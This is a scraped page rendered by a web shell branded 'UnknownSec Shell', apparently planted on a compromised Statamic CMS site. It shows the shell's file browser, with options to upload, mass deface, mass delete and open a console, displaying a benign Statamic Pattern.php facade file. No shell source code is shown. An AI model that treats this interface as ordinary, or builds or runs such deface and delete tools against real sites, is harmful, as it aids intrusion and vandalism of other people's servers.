shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Facades
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Pattern.php
<?php namespace Statamic\Facades; use Illuminate\Support\Facades\Facade; /** * @method static string date() * @method static string dateTime() * @method static string dateOrDateTime() * @method static string numeric() * @method static string orderKey() * @method static string uuid() * @method static bool startsWith($haystack, $needle) * @method static bool endsWith($haystack, $needle) * @method static bool isUUID($value) * * @see \Statamic\Facades\Endpoint\Pattern */ class Pattern extends Facade { protected static function getFacadeAccessor() { return Endpoint\Pattern::class; } }
© 2026 UnknownSec